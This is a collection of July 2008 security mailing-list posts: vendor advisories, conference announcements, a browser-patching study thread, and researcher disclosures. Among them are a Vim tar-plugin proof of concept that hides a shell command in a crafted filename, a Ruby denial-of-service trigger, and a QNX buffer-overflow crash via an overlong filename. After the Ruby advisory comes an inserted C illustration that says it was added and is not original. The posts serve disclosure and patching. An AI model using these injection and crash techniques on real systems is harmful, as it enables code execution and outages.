RE: New Paper: More than 600 million users surf at high risk

2008-07-01 Thread Paul Schmehl
--On July 1, 2008 3:31:32 PM -0400 Larry Seltzer <[EMAIL PROTECTED]>
wrote:

> From your paper:
>
>> It is noteworthy that it has taken 19 months since the initial general
>> availability of IE7 (public release October 2006) to reach 52.5%
>> proliferation amongst users that navigate the Internet with Microsoft's
>> Web browser. Meanwhile, 92.2% of Firefox users have migrated to FF2.
>
> Could this be due to the fact that Mozilla stops supporting, and issuing
> updates for old versions just a few months after the release of a new
> one?



My completely non-scientific, unsupported-by-empirical-evidence answer is 
no.  It's because people who use Firefox tend to be more aware of security 
threats and the need to keep software up to date.  It could also be (at 
least in part) because Firefox has a built-in, enabled-by-default, update 
available warning system.


Paul Schmehl ([EMAIL PROTECTED])
Senior Information Security Analyst
The University of Texas at Dallas
http://www.utdallas.edu/ir/security/




[SECURITY] [DSA 1560-1] New sympa packages fix denial of service

2008-07-01 Thread Steve Kemp

- 
Debian Security Advisory DSA-1600-1  [EMAIL PROTECTED]
http://www.debian.org/security/   Steve Kemp
July 01, 2008 http://www.debian.org/security/faq
- 

Package: sympa
Vulnerability  : dos
Problem type   : remote
Debian-specific: no
CVE Id(s)  : CVE-2008-1648
Debian Bug : 475163

It was discovered that sympa, a modern mailing list manager, would
crash when processing certain types of malformed messages.

For the stable distribution (etch), this problem has been fixed in version
5.2.3-1.2+etch1.

For the unstable distribution (sid), this problem has been fixed in
version 5.3.4-4.

We recommend that you upgrade your sympa package.


Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- ---


  These files will probably be moved into the stable distribution on
  its next update.

- 
-
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security 
dists/stable/updates/main
Mailing list: [EMAIL PROTECTED]
Package info: `apt-cache show ' and http://packages.debian.org/



Re: Collection of Vulnerabilities in Fully Patched Vim 7.1

2008-07-01 Thread Jan Minář
On Sat, Jun 14, 2008 at 2:09 PM, Bram Moolenaar <[EMAIL PROTECTED]> wrote:
>
> Jan Minar wrote:
>
>> 1. Summary
>>
>> Product  : Vim -- Vi IMproved
>> Version  : Tested with 7.1.314 and 6.4
>> Impact   : Arbitrary code execution
>> Wherefrom: Local and remote
>> Original : http://www.rdancer.org/vulnerablevim.html
>>
>> Improper quoting in some parts of Vim written in the Vim Script can lead to
>> arbitrary code execution upon opening a crafted file.

> Note that version 7.1.314, as reported in the Summary, does not have
> most of the reported problems.  The problems in the plugins have also
> been fixed, this requires updating the runtime files.  Information about
> that can be found at http://www.vim.org/runtime.php

I do apologize: as written in the advisory, the version I worked with
was 7.1.298.  7.1.314 was only partly vulnerable.  FWIW, I have
updated the advisory at http://www.rdancer.org/vulnerablevim.html .

Thanks to Bram for all the good work.

7.2a.10 with updated runtime is still vulnerable to the zipplugin
attack, and an updated tarplugin attack:

--- Test results below ---
filetype.vim
  strong  : EXPLOIT FAILED
  weak: EXPLOIT FAILED
tarplugin : EXPLOIT FAILED
tarplugin.updated: VULNERABLE
zipplugin : VULNERABLE
xpm.vim
  xpm : EXPLOIT FAILED
  xpm2: EXPLOIT FAILED
  remote  : EXPLOIT FAILED
gzip_vim  : EXPLOIT FAILED
netrw : EXPLOIT FAILED

The original tarplugin exploit now produces a string of telling error messages:

/bin/bash: so%: command not found
tar: /home/rdancer/vuln/vim/tarplugin/sploit/foo'|sosploit/foo:
Cannot open: No such file or directory
tar: Error is not recoverable: exiting now
/bin/bash: retu: command not found
/bin/bash: bar.tar|retu|'bar.tar: command not found

It's easy to see that it is still possible to execute arbitrary shell commands.

$VIMRUNTIME/autoload/tar.vim of Vim 7.2a.10:

   136   if tarfile =~# '\.\(gz\|tgz\)$'
   137 "   call Decho("1: exe silent r! gzip -d -c ".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - ")
 * 138    exe "silent r! gzip -d -c -- ".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - "
   139   elseif tarfile =~# '\.lrp'
   140 "   call Decho("2: exe silent r! cat -- ".s:Escape(tarfile)."|gzip -d -c -|".g:tar_cmd." -".g:tar_browseoptions." - ")
 * 141    exe "silent r! cat -- ".s:Escape(tarfile)."|gzip -d -c -|".g:tar_cmd." -".g:tar_browseoptions." - "
   142   elseif tarfile =~# '\.bz2$'
   143 "   call Decho("3: exe silent r! bzip2 -d -c ".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - ")
 * 144    exe "silent r! bzip2 -d -c -- ".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - "
   145   else
   146 "   call Decho("4: exe silent r! ".g:tar_cmd." -".g:tar_browseoptions." ".s:Escape(tarfile))
** 147    exe "silent r! ".g:tar_cmd." -".g:tar_browseoptions." ".s:Escape(tarfile)
[...]
   444 fun s:Escape(name)
   445   " shellescape() was added by patch 7.0.111
   446   if exists("*shellescape")
   447    let qnameq= shellescape(a:name)
   448   else
   449    let qnameq= g:tar_shq . a:name . g:tar_shq
   450   endif
   451   return qnameq
   452 endfun

 (*) s:Escape() does not suffice, as it fails to escape ``%'' and friends.

(**) tar(1) allows arbitrary command execution via options ``--to-command'',
 and ``--use-compress-program''.


The updated tarplugin attack is rather simple:

$ rm -rf ./*
$ touch "foo%;eval eval \`echo 0:64617465203e2070776e6564 |
xxd -r\`;'bar.tar"
$ vim +:q ./foo*
$ ls -l pwned
-rw-r--r-- 1 rdancer users 29 2008-07-01 20:18 pwned

Cheers,
Jan Minar.


Deepsec Talks 2007 are online - registration for 2008 is open

2008-07-01 Thread DeepSec 2008

Dear Madam, dear Sir,

DeepSec Vienna, the annual In-Depth Security Conference has opened
online registrations for 2008. Registrations will receive a discount
of 5% off the regular fees until August 31st if you use the following
promotional code: earlybird-L4KZIEUE on our online registration form
at https://deepsec.net/register/

Videos from 2007 are online:

Also we are happy to announce that talks from last year's conference
are online. Listen to last year's talks in full length at:
http://video.google.com/videosearch?q=deepsec&sitesearch=#

Call for Papers still Open for two weeks:

If you have some good ideas for a Talk at the conference and haven't
decided yet to submit we encourage you to do so now. We still accept
submissions at https://deepsec.net/cfp/ or via e-mail to:
[EMAIL PROTECTED]


We hope to hear from you and of course to meet in Vienna in November!

Best Regards,

Paul Böhm,
René Pfeiffer,
Michael Kafka
DeepSec GmbH


--
DeepSec In-Depth Security Conference
November 11th to 14th 2008, Vienna, Austria
https://deepsec.net/



RE: New Paper: More than 600 million users surf at high risk

2008-07-01 Thread Larry Seltzer
From your paper:

>> It is noteworthy that it has taken 19 months since the initial general
>> availability of IE7 (public release October 2006) to reach 52.5%
>> proliferation amongst users that navigate the Internet with Microsoft's
>> Web browser. Meanwhile, 92.2% of Firefox users have migrated to FF2.

Could this be due to the fact that Mozilla stops supporting, and issuing
updates for old versions just a few months after the release of a new
one?

Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blogs.pcmag.com/securitywatch/
Contributing Editor, PC Magazine
[EMAIL PROTECTED]





RE: New Paper: More than 600 million users surf at high risk

2008-07-01 Thread Larry Seltzer
A reply from Robert Hensing at Microsoft
(http://blogs.technet.com/robert_hensing/archive/2008/07/01/vulnerable-w
eb-browser-study-full-of-fail.aspx) says that your study did not include
minor version information for Internet Explorer, probably because such
information is not reported in the user-agent string. But fully-patched
copies of IE5 and IE6 are not insecure in the same way as an unsupported
version; Microsoft is still supporting them. 

So is it true that your study calls anyone running IE7 secure, and
anyone running IE5 or IE6 insecure, regardless of their patch levels?

Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blogs.pcmag.com/securitywatch/
Contributing Editor, PC Magazine
[EMAIL PROTECTED]





Vuln name: Ruby rb_ary_fill() DOS

2008-07-01 Thread snagg
The advisory could be found here: 
http://securenetwork.it/ricerca/advisory/download/SN-2008-02.txt


Secure Network - Security Research Advisory


Vuln name: Ruby rb_ary_fill() DOS

Systems affected: ruby 1.8.x, 1.9.x

Systems not affected: -

Severity: Medium

Local/Remote: Local/Remote

Vendor URL: http://www.ruby-lang.org/

Author(s): Vincenzo "snagg" Iozzo - [EMAIL PROTECTED]

Vendor disclosure: 23rd June 2008

Vendor acknowledged: 25th June 2008

Vendor patch release: 25th June 2008

Public disclosure: 30th June 2008

Advisory number: SN-2008-02

Advisory URL: http://www.securenetwork.it/advisories/


*** SUMMARY ***


Ruby is an interpreted language, used in a wide range of applications.

The specific issue is a Denial of Service vulnerability, caused by an integer
overflow. However, it does not allow arbitrary code execution.

In Ruby on Rails, an attacker may craft specific requests and by XSS (for
example) can cause a legitimate user to crash the web server.



*** VULNERABILITY DETAILS ***


Integer overflow (DoS).

The vulnerability was found in rb_ary_fill().


Looking inside the application source code:

## CUT HERE ##

    rb_ary_modify(ary);
    end = beg + len;
    if (end < 0) {
        rb_raise(rb_eArgError, "argument too big");
    }
    if (end > RARRAY(ary)->len) {
        if (end >= RARRAY(ary)->aux.capa) {
            REALLOC_N(RARRAY(ary)->ptr, VALUE, end);
            RARRAY(ary)->aux.capa = end;
        }

## CUT HERE ##


The len value is incremented by one in a previous function and is specified
by the user. The lack of a sanity check on the input leads to an integer
overflow here:


## CUT HERE ##

 REALLOC_N(RARRAY(ary)->ptr, VALUE, end);

## CUT HERE ##


This macro will in fact allocate end * VALUE. On 32-bit architectures VALUE is
4. If an attacker specifies a value of 0x3fff, this macro will allocate a
memory region of size 0, so that the next time ary->ptr is accessed it will
raise a SIGSEGV (NULL dereference).



*** EXPLOIT ***

a = []

a.fill("A",0..0x3fff)


*** FIX INFORMATION ***


http://svn.ruby-lang.org/cgi-bin/viewvc.cgi/trunk/array.c?view=markup


*

*** LEGAL NOTICES ***

*


Secure Network (www.securenetwork.it) is an information security company,
which provides consulting and training services, and engages in security
research and development.

We are committed to open, full disclosure of vulnerabilities, cooperating
with software developers for properly handling disclosure issues.

This advisory is copyright 2008 Secure Network S.r.l. Permission is
hereby granted for the redistribution of this alert, provided that it is
not altered except by reformatting it, and that due credit is given. It
may not be edited in any way without the express consent of Secure Network
S.r.l. Permission is explicitly given for insertion in vulnerability
databases and similars, provided that due credit is given to Secure Network

The information in the advisory is believed to be accurate at the time of
publishing based on currently available information. This information is
provided as-is, as a free service to the community by Secure Network
research staff. There are no warranties with regard to this information.
Secure Network does not accept any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.

If you have any comments or inquiries, or any issue with what is reported
in this advisory, please inform us as soon as possible.

E-mail: [EMAIL PROTECTED]
GPG/PGP key: http://www.securenetwork.it/pgpkeys/Secure%20Network.asc
Phone: +39 02 24126788
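A worked illustration of the size arithmetic the advisory describes, added here as an example and not taken from Ruby's array.c or from the advisory: it emulates the 32-bit build (sizeof(VALUE) == 4), shows how end * sizeof(VALUE) wraps to 0 once end reaches 2^30 elements, and pairs the naive computation with the overflow check a hardened fill path would apply before reallocating. The function names are the example's own.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Emulates a 32-bit Ruby build as described in the advisory:
 * sizeof(VALUE) == 4 and allocation sizes are 32-bit unsigned. */
#define VALUE_SIZE_32 4u

/* What REALLOC_N(ptr, VALUE, end) effectively computes: nelem * sizeof(type)
 * in size_t arithmetic, which silently wraps modulo 2^32 on a 32-bit host. */
uint32_t naive_alloc_bytes(uint32_t nelem)
{
    return nelem * VALUE_SIZE_32;
}

/* Checked multiplication: false when nelem * elem_size would not fit in
 * 32 bits, so the caller can refuse instead of allocating a wrapped size. */
bool checked_alloc_bytes(uint32_t nelem, uint32_t elem_size, uint32_t *out)
{
    if (elem_size != 0 && nelem > UINT32_MAX / elem_size)
        return false;
    *out = nelem * elem_size;
    return true;
}

/* Model of the fill path: end = beg + len, where len has already been
 * incremented by one for an inclusive range (0..N yields len = N + 1).
 * Returns false where a hardened fill should raise ArgumentError: negative
 * inputs, beg + len overflowing a signed 32-bit long, or an end whose byte
 * size would wrap. */
bool fill_size_ok(int32_t beg, int32_t len, uint32_t *bytes_out)
{
    if (beg < 0 || len < 0)
        return false;
    if (beg > INT32_MAX - len)          /* beg + len would overflow */
        return false;
    int32_t end = beg + len;
    return checked_alloc_bytes((uint32_t)end, VALUE_SIZE_32, bytes_out);
}

/* Single-return convenience wrapper: the byte count, or -1 when the fill
 * would be rejected. */
int64_t fill_bytes_or_neg(int32_t beg, int32_t len)
{
    uint32_t bytes = 0;
    return fill_size_ok(beg, len, &bytes) ? (int64_t)bytes : -1;
}

int main(void)
{
    /* 2^30 elements: 2^30 * 4 == 2^32, which is 0 in 32-bit arithmetic. */
    printf("naive:   end=0x40000000 -> %u bytes\n",
           (unsigned)naive_alloc_bytes(0x40000000u));
    printf("checked: end=0x40000000 -> %lld\n",
           (long long)fill_bytes_or_neg(0, 0x40000000));
    printf("checked: end=10 -> %lld bytes\n",
           (long long)fill_bytes_or_neg(0, 10));
    return 0;
}
```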



New Paper: More than 600 million users surf at high risk

2008-07-01 Thread Stefan Frei
Hi List,

For the last 18 months we analyzed the daily USER-AGENT data collected by
Google's Web search and application servers around the world to study how users
patch and update their Web browsers.

We found that approximately 637 million (or 45.2 percent) users currently
surf the Web on a daily basis with an out-of-date browser – i.e. not running a
current, fully patched Web browser version.

And this is only the tip of what we call the "Insecurity Iceberg", not counting
all the vulnerable browser plug-ins.

One of the new concepts we came up with for combating the inadequacies of
Web browser patching was that of applying the food industry's "Best Before"
date to the Web browser and its plug-ins.

Paper:
Understanding the Web browser threat:
Examination of vulnerable online Web browser populations and the
"insecurity iceberg"

Authors
- Stefan Frei, Communication Systems Group, ETH Zurich, Switzerland
- Thomas Duebendorfer, Google Switzerland GmbH
- Gunter Ollmann, IBM Internet Security Systems, USA
- Martin May, Communication Systems Group, ETH Zurich, Switzerland

Paper Download:
http://www.techzoom.net/insecurity-iceberg



Regards
Stefan Frei


[ GLSA 200807-02 ] Motion: Execution of arbitrary code

2008-07-01 Thread Tobias Heinlein
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200807-02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: Motion: Execution of arbitrary code
  Date: July 01, 2008
  Bugs: #227053
ID: 200807-02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple vulnerabilities in Motion might result in the execution of
arbitrary code.

Background
==========

Motion is a program that monitors the video signal from one or more
cameras and is able to detect motions.

Affected packages
=================

---
 Package /  Vulnerable  /   Unaffected
---
  1  media-video/motion < 3.2.10.1 >= 3.2.10.1

Description
===========

Nico Golde reported an off-by-one error within the read_client()
function in the webhttpd.c file, leading to a stack-based buffer
overflow. Stefan Cornelius (Secunia Research) reported a boundary error
within the same function, also leading to a stack-based buffer
overflow. Both vulnerabilities require that the HTTP Control interface
is enabled.

Impact
======

A remote attacker could exploit these vulnerabilities by sending an
overly long or specially crafted request to a vulnerable Motion HTTP
control interface, possibly resulting in the execution of arbitrary
code with the privileges of the motion user.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Motion users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=media-video/motion-3.2.10.1"

References
==========

  [ 1 ] CVE-2008-2654
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2654

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200807-02.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5





[security bulletin] HPSBMA02345 SSRT080039 rev.1 - HP System Management Homepage (SMH) for Linux and Windows, Remote Cross Site Scripting (XSS)

2008-07-01 Thread security-alert

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c01488878
Version: 1

HPSBMA02345 SSRT080039 rev.1 - HP System Management Homepage (SMH) for Linux 
and Windows, Remote Cross Site Scripting (XSS)

NOTICE: The information in this Security Bulletin should be acted upon as soon 
as possible.

Release Date: 2008-06-30
Last Updated: 2008-06-30

Potential Security Impact: Remote cross site scripting (XSS) 

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP System 
Management Homepage (SMH) for Linux and Windows. This vulnerability could by 
exploited remotely to allow cross site scripting (XSS).

References: CVE-2008-1663

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP System Management Homepage (SMH) v2.1.10 and v2.1.11 running on Linux and 
Windows.

BACKGROUND

CVSS 2.0 Base Metrics 
===
Reference Base Vector   Base Score 
CVE-2008-1663 (AV:N/AC:L/Au:N/C:P/I:P/A:N)  6.4
===
Information on CVSS is documented in HP Customer Notice: HPSN-2008-002.

RESOLUTION
HP has provided System Management Homepage (SMH) v2.1.12 or subsequent to 
resolve these vulnerabilities. SMH v2.1.12, is available from the following web 
sites:

HP System Management Homepage for Linux (x86) v2.1.12-200 can be downloaded
from
http://h2.www2.hp.com/bizsupport/TechSupport/SoftwareDescription.jsp?swItem=MTX-6bfaf43a118b47098e763096e7
 
 
HP System Management Homepage for Linux (AMD64/EM64T) v2.1.12-200 can be 
downloaded from 
http://h2.www2.hp.com/bizsupport/TechSupport/SoftwareDescription.jsp?swItem=MTX-e280953be19b41a385c99a2133
 
 
HP System Management Homepage for Windows v2.1.12.201 can be downloaded from 
http://h2.www2.hp.com/bizsupport/TechSupport/SoftwareDescription.jsp?swItem=MTX-0ee8400155ae4c2bb066f244b2
 
 


PRODUCT SPECIFIC INFORMATION 

HISTORY: 
Version:1 (rev.1) - 30 June 2008 Initial Release 

Third Party Security Patches: Third party security patches which are to be 
installed on systems running HP software products should be applied in 
accordance with the customer's patch management policy. 

Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported 
product, send Email to: [EMAIL PROTECTED] 
It is strongly recommended that security related information being communicated 
to HP be encrypted using PGP, especially exploit information. 
To get the security-alert PGP key, please send an e-mail message as follows:
  To: [EMAIL PROTECTED] 
  Subject: get key

Subscribe: To initiate a subscription to receive future HP Security Bulletins 
via Email: 
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC
 
On the web page: ITRC security bulletins and patch sign-up 
Under Step1: your ITRC security bulletins and patches 
  - check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems 
  - verify your operating system selections are checked and save.


To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php 
Log in on the web page: Subscriber's choice for Business: sign-in. 
On the web page: Subscriber's Choice: your profile summary - use Edit Profile 
to update appropriate sections.


To review previously published Security Bulletins visit: 
http://www.itrc.hp.com/service/cki/secBullArchive.do 


* The Software Product Category that this Security Bulletin relates to is 
represented by the 5th and 6th characters of the Bulletin number in the title: 

GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
MP = HP MPE/iX
NS = HP NonStop Servers
OV = HP OpenVMS
PI = HP Printing & Imaging
ST = HP Storage SW
TL = HP Trusted Linux
TU = HP Tru64 UNIX
UX = HP-UX
VV = HP VirtualVault

System management and security procedures must be reviewed frequently to 
maintain system integrity. HP is continually reviewing and enhancing the 
security features of software products to provide customers with current secure 
solutions.


"HP is broadly distributing this Security Bulletin in order to bring to the 
attention of users of the affected HP products the important security 
information contained in this Bulletin. HP recommends that all users determine 
the applicability of this information to their individual situations and take 
appropriate action. HP does not warrant that this information is necessarily 
accurate or complete for all user situations and, consequently, HP will not be 
responsible for any damages resulting from user's use or disregard of the 
information provided in this Bulletin. To the extent permitted by law, HP 
disclaims all warranties, either express or implied, inc

[ GLSA 200807-01 ] Python: Multiple integer overflows

2008-07-01 Thread Tobias Heinlein
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200807-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: Python: Multiple integer overflows
  Date: July 01, 2008
  Bugs: #216673, #217221
ID: 200807-01

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple integer overflows may allow for Denial of Service.

Background
==========

Python is an interpreted, interactive, object-oriented programming
language.

Affected packages
=================

---
 Package  /   Vulnerable   /Unaffected
---
  1  dev-lang/python  < 2.4.4-r13 *>= 2.3.6-r6
  >= 2.4.4-r13

Description
===========

Multiple vulnerabilities were discovered in Python:

* David Remahl reported multiple integer overflows in the file
  imageop.c, leading to a heap-based buffer overflow (CVE-2008-1679).
  This issue is due to an incomplete fix for CVE-2007-4965.

* Justin Ferguson discovered that an integer signedness error in the
  zlib extension module might trigger insufficient memory allocation
  and a buffer overflow via a negative signed integer (CVE-2008-1721).

* Justin Ferguson discovered that insufficient input validation in
  the PyString_FromStringAndSize() function might lead to a buffer
  overflow (CVE-2008-1887).

Impact
======

A remote attacker could exploit these vulnerabilities to cause a Denial
of Service or possibly the remote execution of arbitrary code with the
privileges of the user running Python.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

The imageop module is no longer built in the unaffected versions.

All Python 2.3 users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-lang/python-2.3.6-r6"

All Python 2.4 users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-lang/python-2.4.4-r13"

References
==========

  [ 1 ] CVE-2008-1679
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1679
  [ 2 ] CVE-2008-1721
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1721
  [ 3 ] CVE-2008-1887
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1887

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200807-01.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5





[SCANIT-2008-001] QNX phgrafx Privilege Escalation Vulnerability

2008-07-01 Thread Scanit Labs
QNX phgrafx Privilege Escalation Vulnerability
Scanit R&D Labs Security Advisory
http://www.scanit.net/rd/advisories/
Jun 30, 2008

Filename:  SCANIT-2008-001.txt
SCANIT ID: SCANIT-2008-001
Published: June 30th, 2008


I. Summary

QNX Software Systems Ltd.'s Neutrino RTOS (QNX) is a real-time
operating system designed for use in embedded systems. From QNX's
website:
"Companies worldwide like Cisco, Delphi, Siemens, Alcatel and Texaco
depend on the QNX technology for network routers, medical devices,
intelligent transportation systems, safety and security systems,
next-generation robotics, and other mission-critical applications. In
addition, QNX forms the core for Ford Motor Co.'s Lincoln Aviator IAV,
an engineering concept vehicle. The new system supports the development
of next-generation in-car communications, infotainment, and telematics
applications." More information is available at
http://www.qnx.com/products/rtos/.

Local exploitation of a buffer overflow vulnerability inside
/usr/photon/bin/phgrafx, included by default in the latest QNX RTOS
version (6.3.2), could allow an attacker to gain root privileges.

II. Affected Products

Scanit has confirmed the existence of this vulnerability in QNX RTOS
6.3.2 and QNX RTOS 6.3.0. Previous versions are probably vulnerable too.

III. Details

The vulnerability itself exists due to improper handling of the
PHOTON_PATH/palette/*.pal file. When a filename greater than
285 characters is created with the extension .pal in the directory
"palette", a stack-based overflow occurs, allowing the attacker to
control program flow.

# PHOTON_PATH=/tmp
# cd /tmp
# mkdir palette
# cd palette
# touch `perl -e 'print "A" x 290 . ".pal"'`
# /usr/photon/bin/phgrafx
Memory fault (core dumped)
#

IV. Solution

According to the vendor's response:

"QNX Software Systems confirms this vulnerability in Momentics 6.3.2 and
earlier versions. The phgrafx binary is to be deprecated in future
releases. For the time being, it is recommended that the user clear the
set user ID bit from the file permissions. If this is done, only the
root user may change the graphics configuration."

V. Timeline

February 20th, 2008 - Vulnerability discovery
March 24th, 2008 - First contact attempt
March 27th, 2008 - Vendor response
June 30th, 2008 - Advisory release

VI. Credits

This vulnerability was discovered by Scanit's researchers Filipe
Balestra and Rodrigo Rubira Branco (BSDaemon).

VII. Contact

Scanit's R&D Labs represent Scanit's efforts in security research
activities. By keeping track of the newest defensive and offensive
technologies, Scanit's researchers are able to contribute with
unpublished works made in-house. This way, by driving the
state-of-the-art in computer security, Scanit honors its commitment
to stay in the front line of scientific evolution.

Reach us at [EMAIL PROTECTED]
Visit http://www.scanit.net

VIII. Disclaimer

The information contained in this document may change without notice.
Use of this information constitutes acceptance for use in an "AS IS"
condition. There are no warranties regarding the topicality,
correctness, completeness or quality of the information provided by
this document. Under no circumstances shall the authors be held liable
for any direct, indirect, or consequential damages, losses, injuries,
or unlawful offences allegedly arising from the use of this
information.


Copyright 2008 Scanit Middle East FZ/LLC



CFP 25C3 - The 25th Chaos Communication Congress 2008

2008-07-01 Thread fukami

The 25th Chaos Communication Congress (25C3)


is the annual four-day conference organized by the Chaos Computer Club
(CCC) in Berlin, Germany. First held in 1984, it has since established
itself as "The European Hacker Conference", attracting a diverse
audience of thousands of hackers, scientists, artists, and utopists
from all around the world.

We want you to join and be a part of this unique event which serves as a
public platform for cross-culture inspiration and borderless networking.
25C3 is fun!



Topics
==

The 25C3 conference program is roughly divided into six general
categories. These categories serve as guidelines for your submissions
(and later as a means of orientation for your prospective audience).
However, it is not mandatory for your talk to exactly match the
descriptions below. Anything that is interesting and/or funny will be
taken into consideration.


Hacking
---
The "Hacking" category addresses topics dealing with technology,
concentrating on current research with high technical merit.
Traditionally, the majority of all lectures at 25C3 revolve around
hacking. Topics in this domain include but are in no way limited to:
programming, hardware hacking, cryptography, network and system
security, security exploits, and creative use of technology.


Making
--
The "Making" category is all about making and breaking things and the
wonderful stuff you can build in your basement or garage. Most welcome
are submissions dealing with the latest in electronics, 3D-fabbing,
climate-change survival technology, robots and drones, steam machines,
alternative transportation tools and guerrilla-style knitting.


Science
---
The "Science" category covers current or future objects of scientific
research that have the potential to radically change our lives, be it
basic research or projects conducted for the industry. We are looking
for talks and papers on the state of the art in this domain, covering
subjects such as nanotechnology, quantum computing, high frequency
physics, biotechnology, brain-computer interfaces, automated analysis
of surveillance CCTV, etc.


Society
---
Technology development causes great changes in society and will
determine our future. This category is for all talks on subjects like
hacker tools and the law, surveillance practices, censorship,
intellectual property and copyright issues, data retention, software
patents, effects of technology on kids, and the impact of technology on
society in general.


Culture
---
Shaping the world we live in means making it more interesting,
entertaining and beautiful. The hacker culture has many facets ranging
from electronic art objects, stand-up comedy, geek entertainment, video
game and board game culture, music, 3D art to e-text literature and
beyond. If you would like to show your art and teach others how to make
their lives more enjoyable, this category is for you.


Community
-
In addition to individual speakers, the Chaos Communication Congress is
also inviting groups such as developer teams, projects and activists to
present themselves and their topics. Developer groups are also
encouraged to ask for support to hold smaller on-site developer
conferences and meetings in the course of the Congress.



Further Information
===

The Chaos Communication Congress is a non-profit oriented event and
speakers are not paid. However, financial help on travel expenses and
accommodation is possible. It needs to be agreed upon after acceptance
of the submission, though. Don't be shy and state your requirements in
the application when submitting your lecture and we'll work something
out!

You can find the preliminary agenda and additional information on our
25C3 website at http://events.ccc.de/congress/2008/.

For further information and questions please feel free to contact
[EMAIL PROTECTED]



Submissions
===

All proposals must be submitted online using our online lecture
submission system at https://cccv.pentabarf.org/submission/25C3. Please
follow the instructions given there. If you have any questions regarding
your submission, feel free to contact us at [EMAIL PROTECTED] but do NOT
submit your lecture via e-mail.



Language


25C3 is an international event and we want to have a lot of interesting
talks in English for the benefit of our growing number of international
guests. So ideally we are looking for speakers who can give lectures
and/or workshops in either English or German. But while we are
interested in maximizing the quality of presentations, the topic and its
relevance to our community are our main concern. So don't worry about
your English skills: the language of a submission is not a criterion for
accepting or rejecting it!

If you feel insecure talking in English, have received criticism on your
language skills from your audience before, or i

[SCANIT-2008-003] Wordtrans-web Remote Command Execution Vulnerability

2008-07-01 Thread Scanit Labs
Wordtrans-web Remote Command Execution Vulnerability
Scanit R&D Labs Security Advisory
http://www.scanit.net/rd/advisories/
Jun 30, 2008

Filename:  SCANIT-2008-003.txt
SCANIT ID: SCANIT-2008-003
Published: June 30th, 2008


I. Summary

Wordtrans is a free front-end graphical application that allows you to
look for words in several dictionaries. It can also translate the word
that the user selects with his mouse.

The latest Wordtrans version could allow a remote attacker to execute
arbitrary code on the server, caused by an input validation error in
the wordtrans-web package, which is a PHP-based Web interface for
Wordtrans.

II. Affected Products

This vulnerability affects wordtrans 1.1pre15 and probably previous
versions.

III. Details

When sending a request without the variable "command" or with an
undefined command and any word in the variable "word", the variable
"link_options" receives one argument from the user, passed in the
"advanced" variable using the POST method. Then, the variable
"link_options" is concatenated with the variable "exec_wordtrans".
Since "exec_wordtrans" is passed to the function "passthru" without
checking for special characters, we can send shell characters like |
or ; to execute commands on the machine with the privileges of the Web
server process when the URL is submitted. This is part of the
